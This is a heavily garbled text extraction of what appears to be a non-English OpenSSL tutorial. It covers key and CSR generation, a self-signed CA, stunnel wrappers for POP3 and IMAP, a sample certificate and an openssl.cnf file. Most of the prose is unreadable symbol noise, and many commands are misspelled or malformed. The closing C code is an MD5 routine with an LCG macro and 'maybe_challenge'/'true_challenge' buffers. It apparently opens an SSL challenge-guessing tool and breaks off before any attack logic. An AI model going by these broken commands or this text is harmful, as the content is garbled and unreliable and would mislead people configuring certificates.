[−nwkeyrsa: bits][−newkeydsa: fise][−nodes][−key filenane][−keyfotmPEM
DER][−keyoutfilename][−[md5 sha1 md2 ]][−configfilename][−x509][−days n]
[−asn1− kludge][−newhdr][−extensionssection][−reqextssection]
aT) ,
-inform NER, PEM ,
,
0
-outform NET, ,
) ),B
F) 3 CSR
2 G
PEM ?@ e Y 4 , 0,< DER
d*
CSR
) )"
) ) CSR
,
,
% <
&
) )% '
- Y
?@ paaaphrase , < -, < &
& 2
7
-,< ,
1/
-)8!
0,
-noout
-modulus
F) 3
CSR
6 D F) 3
'
d*
CSR
6,B'
F) 3
6, B'-, < , ( ' & 2 "
CSR %3
-, 3
) ) CSR
0 <
-text -
'
PEM
0 <
-passin arg
'
PEM ?@ e Y 4 , 0,< DER
,
0
-infilename "
2G
6 &
&
Y
0, < 5
6D
5!, B modulus
5 H
0,
-new 7 !89 )
E
<
CSR
0 <
- Y -, < d *
_0 <
-newkey rsa: bits CSR
-keyout filename
E ;!
'
,
–key
& 2 " - Y
) )" & "
, B " CSR
& "
,1 ,B
,< -,
) PSA
L3 , B
0,
d*
,B 6
<
< ?@
d*
]
& 2 " - Y
,G Bits 0 <
L3 , B
B'(
,
-x509
E root 6
CSR
<
F
,1
& 2
d*
& 2 " - Y
0 <
-days n
P! ?& n ,< -,< - Y –x509
6
& "
0,
, 1 CSR
a,
L3 , B
d*
" - Y
"
openssl req - new- key key. Pem - out req. pem.
a,
, 1 ? &56 9
CSR
)
L3 , B
"
openssl req - newkey rsa : 1024 – keyout key. Pem – out req. pem.
a,
, 1 ? &56 9
root 6
)
L3 , B
"
openssl req –x509- newkey rsa: 1024 – key. Pem- out cert. Pem.
x509
B ( '0 <
- Y
6
),
&
b
6
a,<
,
2 "
" %#<
2
opensslx509[−informDERPEMNET][−outform
DERPEMNET][−keyform
DER
PEM][−CAformDERPEM][−CAkeyform
DERPEM][−infilename
][−outfilenam
e]
[−hash][−subject
][−issuer][−nameopt
][−enddate
][−purpose
]
option][−email][−startdate
[−dates][−modulus][− fingerpr
int][−alias][−noout][−trustout
][−clrtrust
][−clrreject
]
[−addtrust
arg][−addreject
arg][−daysn][−signkeyfilename
][−x509toreq][−req][−CAfilename
]
[−CAkeyfilename
][−CAcreatese
rial][−CAserialfilename
][−text][−C][−md2− md5 − shal − mdc2]
[−clrext][−extfile][−extfilefilename
][−extensions
section]
a T) ,
- inform $PEM ,
,
- outform $PEM ,
,
'
NET
F) 3 CSR
2 G
'
PEM ?@ e Y 4 , 0,< DER
0
0,
-,
) ) CSR
2 G
PEM ?@ e Y 4 , 0,< DER
0
- in filename
6 &
d*
CSR
,
) ) CSR
3
% <
NET
) )% '
- Y
& 2 "
0 <
- out filename "
0,
d*
,
CSR
-,< < ?@
) ) CSR
) )"
B'
- Y
& 2
0 <
- text
7
-, < ,
1/
0,
- nooout
CSR
F) 3
CSR
-)8!
'
-, 3
F) 3
6, B'
& -
6, B
'-,< , ( ' & 2 " - Y
0, < 5
- modulus
F) 3
6
5! , B modulus 5 H
%3
0,
- serial
- hash 0,
0,
- subject
- issuer
6D F) 3
6D F) 3
0,
0,
6D
6
6
S/
6D F) 3
6D F) 3
6
6D
T
- 5<
( hash
,
6
(
-,
S/
(
- email
6 D F) 3
6
S/
# ) #1
4h @
0,
- startdate
0,
- enddate
- dates
6D z) 3
0,
0,
6D z) 3
6D F) 3
- fingerprint
0,
- signkey filename
6
>
6D F) 3
6
<
E filename
>
v
) ),
v
1E
;!
'
v
6
6
root 6
),
>
& 2 " - Y
H
L3 , B " - Y
0 <
- keyfrom ,
,
) )
L3 , B
PEM ?@ e Y 4 , ,< DER
0
- days n
d*
P! ?& n ,< -,< - Y –x509
6
% , PCSR
- Y
d*
6
–signkey
2
PEM
& "
0,
- x509toreq , B " 0,
&
'
& 2
-,< -
L3
0 <
- req
-,
3
) )? !
-,
3
) )
6
e Y 4
CSR
1/
& 2 " - Y
0 <
0 <
- CA filename ?
>
6
0 <
- Cakey filename " ?
-
Caserial
d*
filename
4( "
&
nB
G
& 2 b
6
d*
),
& 2 b
7 P
! % '2 (
4 -)8!
,
6
E
),
<
&
6CERTICATE T
0srl ,
- CA createserial
d*
>
0 <
),
6
- Y
L3 , B
<
- Y ?@
- 5< ) / % '
e Y 4 , 0,
&
6certificate T
^
6
- 5< % '
filename
- extfile filename ,
H ?@
6extention
- Y
0,
- extentions sectio
& 2 "
W 3 extention
6
d*
? )&'
0 <
a,6
?
6
B'
7 !89
- Y
"
openssl x509 – in cert. Pom-noout-text
a,6
?
6
T
- 5< "
openssl x509 – in cert. Pom-noout-serial
a,6
?
6
S/
(
"
openssl x509 – in cert. Pem – noout-subject
a,6
?
6
1E
>
"
– fingerprint openssl x509 – in cert. Pem – noout
% ,P DER
a,
' PEM
'"
6
"
openssl x509 – in cert. Pem – inform PEM – out cert. Der-outform DER
a,
% ,P CSR
6
"
openssl x509 –x509 toreq-in cert. Pom –out req. pem – signkey key. Pem
a,
% ,Proot 6
CSR
"
openssl x509 – req-in careq.pom-signkey key. Pem-out cacert.pom
>
6
),
&
L3 , B ) 6
" - Y
CSR
"
a,
openssl x509 –req – in req. pem – CA cacert. Pem – CA key key . pemCacreateserial
F) 1/ ) SSL b
a
-,< & 7 !89 ?
)
,
#4
? !
.
?
@2
&
"
H ) ,<
" ,
T) ,
" U4 -
1/ )
a
2
U)
…
], 5 T
#
,
U)
5 -, <
- < Stunnel
) )
6
F) 3
' ),
,<
6
@
9
] ,<
-, < &
"
'
- Y SSL Wrapper
\ 2 0
E n 9 2, ?
)
I
0_ IMAP )
6 &'(
7Y
SLL
5 SSL
1/ 2
"
,
?
SSl " - Y ?#
'X ?@
) '
6 &'(
I
0 _Apache O) )
b' 1/ 2
7 !89 T
6U )
SSL 7 #
) ,<
0
&
=B*
'
a
'
)
)
L3 , B
L3 , B
,1
openssl genrsa – out key. Pim 1024
a CSR
0
L3 , B b
?@ ?
>
a
6
'
),
CSR ?
&
" - Y CSR ?
"
,1
'
>
openssl x509 – req – in csr. Pem – signkey key key. Pem – pem – out .
pem – days 365
POP3 )
- 56
Stunnel &'(
SSL " -,Y - . \ X
" POP3 )
?,<
- 56 SSL " - Y
a
2#5 n 9 )
2<)
5 H2
<
-
iX
Stunnel " 0 <
- Y
7
4
@)-
,6
A
a
'
{{Š - 5 < 7
wwq - 5 < 7 4
H
)
6script
7
4"
b
,
7 !89 Stunnel
-, < &
7 !89 2 ) ,
"
7
Y wwq - 5<
2
0, < A"
4
Stunnel-d995 –p/usr/ local/ssl/certs/stunnnel. Pem – r localhost: 110
U)
,
)"
'
7
-,< & 7 !89 Stunnel
{{Š - 5< 7 4 "
2
0,
F -, <
&
a
!89 2 A"
H
4
6Script
7
Stunnel-d995 –p /usr/local/ssl/certs/stunnel.pim-l/usr / sbin/imapd
)
L3 , B % < S
stunnel.pem c
% '
, B " , G Stunnel.pem % ' 0, <
0,<
<
_ -,
F) ,
&
)
7
13 :
6
] )
) W 3 L*< ¢
^P 2
0,
,
— )
? 59 5 <
? 3 IE
"
,
6
6
, 5 '—
"
5<
- P< ?#
!89 % < ,
: 56
6
0_ B
# %. $ P! 7, $ % 5 h @ $ ( , 56$
- 5 >
7 !89 2
L*< 1 E
hash
% H 56
? 4
)
H
,
> )
5<
'2
F T/
6
?@ S/
)h @
5! , B % < 6
I
" - Y )
6
CA 0
5! - ›,
) > )-
R ,
$O)
CA
' 7 !89
7 )&B "
5<
@
&
L3
0
@^
2 0,
—L*<
—
5<
, 5
)
R
6 6
) 1E
N
2 2 `560
0,<
$, - 5
^P
< ? 59
6 ],
7 !89 )
),
N c 5G 5<
" €,<
$, 6 ? 59 )
L3
—6
M 9 ?@ — › GH ) @ €, - ›
'2 ) -
)
6
" ,G & )
a Certificate
? I
6
5<
5! &
5
'
N 56
6
c 5G 0,<
C
2
SSL
(Certificate Autority)
6>
56
1% <
a
"7
—6
¢ 2 * A)
CA.pl −newcert
(openssl req −config /etc/openssl.cnf −new −x509 −keyout newreq.pem \
−out newreq.pem −days 365)
#
b
F
6
6
6
0
,
( 5 0,
? 59 % H
g
5 <$
1E
u) j
-,< >
3 6
0,
?@
66 6
>
"
)% HC
8
-, < >
$,
T
6
6
) > A 3
\ 2 " 6CA
6
a
6
6
2 "
#
"
5
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=FJ, ST=Fiji, L=Suva, O=SOPAC, OU=ICT, CN=SOPAC Root
CA/[email protected]
Not Before: Nov 20 05:47:44 2001 GMT
Not After : Nov 20 05:47:44 2002 GMT
Subject:
C=FJ,
ST=Fiji,
L=Suva,
O=SOPAC,
CN=www.sopac.org/[email protected]
Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:ba:54:2c:ab:88:74:aa:6b:35:a5:a9:c1:d0:5a:
9b:fb:6b:b5:71:bc:ef:d3:ab:15:cc:5b:75:73:36:
b8:01:d1:59:3f:c1:88:c0:33:91:04:f1:bf:1a:b4:
7a:c8:39:c2:89:1f:87:0f:91:19:81:09:46:0c:86:
08:d8:75:c4:6f:5a:98:4a:f9:f8:f7:38:24:fc:bd:
94:24:37:ab:f1:1c:d8:91:ee:fb:1b:9f:88:ba:25:
da:f6:21:7f:04:32:35:17:3d:36:1c:fb:b7:32:9e:
42:af:77:b6:25:1c:59:69:af:be:00:a1:f8:b0:1a:
6c:14:e2:ae:62:e7:6b:30:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
OU=ICT,
Public
Key
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
FE:04:46:ED:A0:15:BE:C1:4B:59:03:F8:2D:0D:ED:2A:E0:ED:F9:2F
X509v3 Authority Key Identifier:
keyid:E6:12:7C:3D:A1:02:E5:BA:1F:DA:9E:37:BE:E3:45:3E:9B:AE:E5
:A6
DirName:/C=FJ/ST=Fiji/L=Suva/O=SOPAC/OU=ICT/CN=SOPAC Root
CA/Email=administrator@serial:00
Signature Algorithm: md5WithRSAEncryption
34:8d:fb:65:0b:85:5b:e2:44:09:f0:55:31:3b:29:2b:f4:fd:
aa:5f:db:b8:11:1a:c6:ab:33:67:59:c1:04:de:34:df:08:57:
2e:c6:60:dc:f7:d4:e2:f1:73:97:57:23:50:02:63:fc:78:96:
34:b3:ca:c4:1b:c5:4c:c8:16:69:bb:9c:4a:7e:00:19:48:62:
e2:51:ab:3a:fa:fd:88:cd:e0:9d:ef:67:50:da:fe:4b:13:c5:
0c:8c:fc:ad:6e:b5:ee:40:e3:fd:34:10:9f:ad:34:bd:db:06:
ed:09:3d:f2:a6:81:22:63:16:dc:ae:33:0c:70:fd:0a:6c:af:
bc:5a
−−−−−BEGIN CERTIFICATE−−−−−
MIIDoTCCAwqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBiTELM
AkGA1UEBhMCRkox
DTALBgNVBAgTBEZpamkxDTALBgNVBAcTBFN1dmExDjAMBgNVB
AoTBVNPUEFDMQww
CgYDVQQLEwNJQ1QxFjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJ
jAkBgkqhkiG9w0B
CQEWF2FkbWluaXN0cmF0b3JAc29wYWMub3JnMB4XDTAxMTEyM
DA1NDc0NFoXDTAy
MTEyMDA1NDc0NFowgYkxCzAJBgNVBAYTAkZKMQ0wCwYDVQQIE
wRGaWppMQ0wCwYD
VQQHEwRTdXZhMQ4wDAYDVQQKEwVTT1BBQzEMMAoGA1UECxMDS
UNUMRYwFAYDVQQD
Ew13d3cuc29wYWMub3JnMSYwJAYJKoZIhvcNAQkBFhdhZG1pb
mlzdHJhdG9yQHNv
cGFjLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAu
lQsq4h0qms1panB
0Fqb+2u1cbzv06sVzFt1cza4AdFZP8GIwDORBPG/GrR6yDnCi
R+HD5EZgQlGDIYI
2HXEb1qYSvn49zgk/L2UJDer8RzYke77G5+IuiXa9iF/BDI1F
z02HPu3Mp5Cr3e2
JRxZaa++AKH4sBpsFOKuYudrMOkCAwEAAaOCARUwggERMAkGA
1UdEwQCMAAwLAYJ
YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZ
mljYXRlMB0GA1Ud
DgQWBBT+BEbtoBW+wUtZA/gtDe0q4O35LzCBtgYDVR0jBIGuM
IGrgBTmEnw9oQLl
uh/anje+40U+m67lpqGBj6SBjDCBiTELMAkGA1UEBhMCRkoxD
TALBgNVBAgTBEZp
amkxDTALBgNVBAcTBFN1dmExDjAMBgNVBAoTBVNPUEFDMQwwC
gYDVQQLEwNJQ1Qx
FjAUBgNVBAMTDVNPUEFDIFJvb3QgQ0ExJjAkBgkqhkiG9w0BC
QEWF2FkbWluaXN0
cmF0b3JAc29wYWMub3JnggEAMA0GCSqGSIb3DQEBBAUAA4GBA
DSN+2ULhVviRAnw
VTE7KSv0/apf27gRGsarM2dZwQTeNN8IVy7GYNz31OLxc5dXI
1ACY/x4ljSzysQb
xUzIFmm7nEp+ABlIYuJRqzr6/YjN4J3vZ1Da/ksTxQyM/K1ut
e5A4/00EJ+tNL3b
Bu0JPfKmgSJjFtyuMwxw/Qpsr7xa
−−−−−END CERTIFICATE−−−−−
nB
G
5! , B 0
n:
# " ? 59
,B 6
T
?@
# 0, ›
6
, B
0
B
. "
B
.
#
]
<
- Y
6
6
'X
R &
T
-,
'-,< ,
?@ S/
b
-, <
-,< > ( 4
F
6
6
b'
2 0 <-
,
P! $
N 56
2 S/
7 !89
F " , P & 6, B 2
&
' 56 ) / 6
)/
> ? ") 6
2
N %.
- Y
GF
"
,
#
3
L3
L3 , B N 7 P
!
6-
) 6 6
, P)
$,
<
R & ( 4b
. ,
)_
L3
a OpenSSL ,
#4% '
#−−−Begin−−−
#
# OpenSSL example configuration file.
# This is mostly being used for generation of certificate requests.
#
RANDFILE = $ENV::HOME/.rnd
oid_file = $ENV::HOME/.oid
oid_section = new_oids
# To use this configuration file with the "−extfile" option of the
# "openssl x509" utility, name here the section containing the
# X.509v3 extensions to use:
# extensions =
# (Alternatively, use a configuration file that has only
# X.509v3 extensions in its main [= default] section.)
[ new_oids ]
# We can add new OIDs in here for use by '
ca'and '
req'
.
# Add a simple OID like this:
# testoid1=1.2.3.4
# Or use config file substitution like this:
# testoid2=${testoid1}.5.6
###########################################################
#########
[ ca ]
default_ca = CA_default # The default ca section
###########################################################
#########
[ CA_default ]
dir = /var/ssl # Where everything is kept
certs = $dir/certs # Where the issued certs are kept
crl_dir = $dir/crl # Where the issued crl are kept
database = $dir/index.txt # database index file.
new_certs_dir = $dir/newcerts # default place for new certs.
certificate = $dir/cacert.pem # The CA certificate
serial = $dir/serial # The current serial number
crl = $dir/crl.pem # The current CRL
private_key = $dir/private/cakey.pem # The private key
RANDFILE = $dir/private/.rand # private random number file
x509_extensions = usr_cert # The extentions to add to the cert
# Extensions to add to a CRL. Note: Netscape communicator chokes on
V2 CRLs
# so this is commented out by default to leave a V1 CRL.
# crl_extensions = crl_ext
default_days = 365 # how long to certify for
default_crl_days= 7 # how long before next CRL
default_md = sha1 # which md to use.
preserve = no # keep passed DN ordering
# A few difference way of specifying how similar the request should look
# For type CA, the listed attributes must be the same, and the optional
# and supplied fields are just that :−)
policy = policy_match
# For the CA policy
[ policy_match ]
countryName = match
stateOrProvinceName = optional
localityName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
# For the '
anything'policy
# At this point in time, you must list all acceptable '
object'
# types.
[ policy_anything ]
countryName = optional
stateOrProvinceName = optional
localityName = optional
organizationName = optional
organizationalUnitName = optional
commonName = supplied
emailAddress = optional
###########################################################
#########
[ req ]
default_bits = 1024
default_keyfile = privkey.pem
distinguished_name = req_distinguished_name
attributes = req_attributes
default_md = sha1
x509_extensions = v3_ca # The extentions to add to the self signed cert
# Passwords for private keys if not present they will be prompted for
# input_password = secret
# output_password = secret
# This sets a mask for permitted string types. There are several options.
# default: PrintableString, T61String, BMPString.
# pkix : PrintableString, BMPString.
# utf8only: only UTF8Strings.
# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
# MASK:XXXX a literal mask value.
# WARNING: current versions of Netscape crash on BMPStrings or
UTF8Strings
# so use this option with caution!
string_mask = nombstr
# req_extensions = v3_req # The extensions to add to a certificate request
[ req_distinguished_name ]
countryName = Country Name (2 letter code)
countryName_default = FJ
countryName_min = 2
countryName_max = 2
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = Fiji
localityName = Locality Name (eg, city)
localityName_default = Suva
0.organizationName = Organization Name (eg, company)
0.organizationName_default = SOPAC
# we can do this but it is not needed normally :−)
#1.organizationName = Second Organization Name (eg, company)
#1.organizationName_default = World Wide Web Pty Ltd
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = ITU
commonName = Common Name (eg, YOUR name)
commonName_max = 64
emailAddress = Email Address
emailAddress_max = 40
# SET−ex3 = SET extension number 3
[ req_attributes ]
challengePassword = A challenge password
challengePassword_min = 4
challengePassword_max = 20
unstructuredName = An optional company name
[ usr_cert ]
# These extensions are added when '
ca'signs a request.
# This goes against PKIX guidelines but some CAs do it and some
software
# requires this to avoid interpreting an end user certificate as a CA.
basicConstraints=CA:FALSE
# Here are some examples of the usage of nsCertType. If it is omitted
# the certificate can be used for anything *except* object signing.
# This is OK for an SSL server.
# nsCertType = server
# For an object signing certificate this would be used.
# nsCertType = objsign
# For normal client use this is typical
# nsCertType = client, email
# and for everything including object signing:
# nsCertType = client, email, objsign
# This is typical in keyUsage for a client certificate.
# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# PKIX recommendations harmless if included in all certificates.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid,issuer:always
# This stuff is for subjectAltName and issuerAltname.
# Import the email address.
# subjectAltName=email:copy
# Copy subject details
# issuerAltName=issuer:copy
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ v3_ca ]
# Extensions for a typical CA
# PKIX recommendation.
subjectKeyIdentifier=hash
authorityKeyIdentifier=keyid:always,issuer:always
# This is what PKIX recommends but some broken software chokes on
critical
# extensions.
# basicConstraints = critical,CA:true
# So we do this instead.
basicConstraints = CA:true
# Key usage: this is typical for a CA certificate. However since it will
# prevent it being used as an test self−signed certificate it is best
# left out by default.
# keyUsage = cRLSign, keyCertSign
# Some might want this also
# nsCertType = sslCA, emailCA
# Include email address in subject alt name: another PKIX
recommendation
# subjectAltName=email:copy
# Copy issuer details
# issuerAltName=issuer:copy
# RAW DER hex encoding of an extension: beware experts only!
# 1.2.3.5=RAW:02:03
# You can even override a supported extension:
# basicConstraints= critical, RAW:30:03:01:01:FF
# This will be displayed in Netscape'
s comment listbox.
nsComment = "Certificate issued by https://www.sopac.org/ssl/"
# This is the base URL for all others URL addresses
# if not supplied
nsBaseUrl = https://www.sopac.org/ssl/
# This is the link where to download the latest Certificate
# Revocation List (CRL)
nsCaRevocationUrl = https://www.sopac.org/ssl/sopac−ca.crl
# This is the link where to revoke the certificate
nsRevocationUrl = https://www.sopac.org/ssl/revocation.html?
# This is the location where the certificate can be renewed
nsRenewalUrl = https://www.sopac.org/ssl/renewal.html?
# This is the link where the CA policy can be found
nsCaPolicyUrl = https://www.sopac.org/ssl/policy.html
# This is the link where we can get the issuer certificate
issuerAltName = URI:https://www.sopac.org/ssl/sopac.crt
# This is the link where to get the latest CRL
crlDistributionPoints = URI:https://www.sopac.org/ssl/sopac−ca.crl
[ crl_ext ]
# CRL extensions.
# Only issuerAltName and authorityKeyIdentifier make any sense in a
CRL.
# issuerAltName=issuer:copy
authorityKeyIdentifier=keyid:always,issuer:always
#−−−−End−−−−
a =B*
a
6
_CA]
6
,F 'X
"
)
2 )
SL A)
6
,
Openssl. X 509 - in cacert.pem – out cacert.crt
a "h @
,6
H?
3
O)
-,< E % '2
http://yoursite.com/ssl/cacert.crt
?
< crt \ "
,<
0 <– R
•Y
,
$,
) - 3•
H
.
,
" U4
@
P
<
5<
6 #6•Y "
& 5 <0 <
")
6
3
6
@
B
F
")
0, 5 'X
,
" j
? •Y b
update
'G
3-
B
5F "
)
- 3•S
B Netscapeb
2 0, K5
%.
? 5 5<
@ ) ,6
d *
SL %/
N4
)
<
(E
6& \ , C
5 / SL B
/ ? 4
%P
H" ,
d*
0 … ) 6,› 3
5
$%5
5!
@
6> $
?
'X
0,
6
,
F)
)
SL
),
<
SL A)
O) "
0, 5
YB*
("c – 6—
6
,
3% !
') #
—6
5<
<
6
), Nh5
-N4
#
F ') #
P
# 7, ,
#
5<
)
a Mozilla ) Netscape
:
O)
#
-
,
,
"
,6 * ?
O)
$ ) 42
5< )
-,< - @ 5< 6
F?
0
6
b
2 `56, 5
6
3 j< 4
) ),
O) ) , CA 6
CA ,
<
)
$
"
" , <
MIME \ "
B'
7 #
6
- Y
O) $ % !
a Galeon
)
,< ,6 3
6
2 "
, –6
SL A)
HTML 5F
0
" )
F) Galeon
,
6
6
" $,
% 5! Mozilla
,
3 & 2
CH Galeon
),
a lnternet Explorer
I'/ )
" 0
9
6 D ?@ S L
@
2
2 T
% ') -
3
6
&
d*
,
B-
: IE _-, < Z>
6,G
6
3]
I.12 " ,
F SSL %•) 4 " ,
— )
h @
)
- Y
SL A)
?
)
b
) % ' ) 0, K5 - 3• 3
,
3 6
SL
5!
,6 3 5 !
6
2 # KE @
6 6
,< -,< Z> CA
0, K5 - Y
6-
aC?"
#include <std/disclaimer.h>
#include <stdio.h>
#include <stdlib.h>
typedef unsigned int UINT4;
#define S11 7
#define S12 12
#define S13 17
#define S14 22
#define S21 5
#define S22 9
#define S23 14
SSL % '–"
- 4" –
5
#define S24 20
#define S31 4
#define S32 11
#define S33 16
#define S34 23
#define S41 6
#define S42 10
#define S43 15
#define S44 21
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits.
*/
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4.
Rotation is separate from addition to prevent recomputation.
*/
#define FF(a, b, c, d, x, s, ac) { \
(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) { \
(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) { \
(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) { \
(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
void MD5Transform1(unsigned char state[16], unsigned char block[64])
{
UINT4 a = 0x67452301, b = 0xefcdab89, c = 0x98badcfe, d =
0x10325476, x[16];
unsigned int i,j;
for (i = 0, j = 0; j < 64; i++, j += 4)
x[i] = ((UINT4)block[j]) | (((UINT4)block[j+1]) << 8) |
(((UINT4)block[j+2]) << 16) | (((UINT4)block[j+3]) << 24);
/* Round 1 */
FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */
FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */
FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */
FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */
FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */
FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */
FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */
FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */
FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */
FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */
FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */
FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */
FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */
FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */
FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */
FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */
/* Round 2 */
GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */
GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */
GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */
GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */
GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */
GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */
GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */
GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */
GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */
GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */
GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */
GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */
GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */
GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */
GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */
GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */
/* Round 3 */
HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */
HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */
HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */
HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */
HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */
HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */
HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */
HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */
HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */
HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */
HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */
HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */
HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */
HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */
HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */
HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */
/* Round 4 */
II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */
II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */
II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */
II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */
II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */
II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */
II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */
II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */
II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */
II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */
II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */
II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */
II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */
II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */
II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */
II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */
a += 0x67452301;
b += 0xefcdab89;
c += 0x98badcfe;
d += 0x10325476;
/* We need to swap endianness here */
state[0] = ((unsigned char *)&a)[3];
state[1] = ((unsigned char *)&a)[2];
state[2] = ((unsigned char *)&a)[1];
state[3] = ((unsigned char *)&a)[0];
state[4] = ((unsigned char *)&b)[3];
state[5] = ((unsigned char *)&b)[2];
state[6] = ((unsigned char *)&b)[1];
state[7] = ((unsigned char *)&b)[0];
state[8] = ((unsigned char *)&c)[3];
state[9] = ((unsigned char *)&c)[2];
state[10] = ((unsigned char *)&c)[1];
state[11] = ((unsigned char *)&c)[0];
state[12] = ((unsigned char *)&d)[3];
state[13] = ((unsigned char *)&d)[2];
state[14] = ((unsigned char *)&d)[1];
state[15] = ((unsigned char *)&d)[0];
}
#define mklcpr(val)
((0xdeece66d*(val)+0x2bbb62dc)>>1)
int main(int argc, char **argv)
{
int
i;
unsigned char maybe_challenge[16], true_challenge[16];
